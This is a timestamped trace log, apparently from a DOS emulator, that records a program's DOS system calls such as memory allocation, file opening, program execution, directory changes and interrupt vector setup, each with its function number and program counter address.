2018-12-25T12:21:42.413658823Z 73 PC: 8fa11 | Release memory
2018-12-25T12:21:42.416308995Z 73 PC: 8efea | Release memory
2018-12-25T12:21:42.418059055Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:21:42.420094631Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:21:42.422808131Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:21:42.424804336Z 73 PC: 8f060 | Release memory
2018-12-25T12:21:42.426575085Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:21:42.43778543Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:21:42.445134243Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:21:42.447112898Z 62 PC: 8f0d1 | Close file
2018-12-25T12:21:42.450437255Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:21:42.474433294Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:21:42.475778775Z 48 PC: 12bee | Get DOS version
2018-12-25T12:21:42.478699702Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:21:42.482022597Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:21:42.483831986Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:21:42.485638981Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:21:42.488398399Z 72 PC: 1355d | Allocate memory
2018-12-25T12:21:42.490107878Z 25 PC: 13596 | Get default drive
2018-12-25T12:21:42.49128414Z 71 PC: 135ad | Get current directory
2018-12-25T12:21:42.494687933Z 59 PC: 135ba | Change current directory
2018-12-25T12:21:42.500861121Z 59 PC: 135c8 | Change current directory
2018-12-25T12:21:42.50834977Z 59 PC: 135d3 | Change current directory
2018-12-25T12:21:42.513521813Z 25 PC: 12d13 | Get default drive
2018-12-25T12:21:42.515572065Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:21:42.517247658Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:21:42.519739881Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:21:42.522704152Z 80 PC: 1301d | Set current PSP
2018-12-25T12:21:42.523850151Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:21:42.526048081Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:21:42.527668629Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:21:42.529062213Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:21:42.532006537Z 72 PC: 130ec | Allocate memory
2018-12-25T12:21:42.534194989Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:21:42.541283816Z 62 PC: 131ba | Close file
2018-12-25T12:21:42.544169382Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:21:42.546684776Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:21:42.548666514Z 72 PC: 11991 | Allocate memory
2018-12-25T12:21:42.55084432Z 73 PC: 119b2 | Release memory
2018-12-25T12:21:42.553750963Z 72 PC: 119bd | Allocate memory
2018-12-25T12:21:42.555983927Z 73 PC: 119df | Release memory
2018-12-25T12:21:42.557816201Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:21:42.561260254Z 72 PC: 119fd | Allocate memory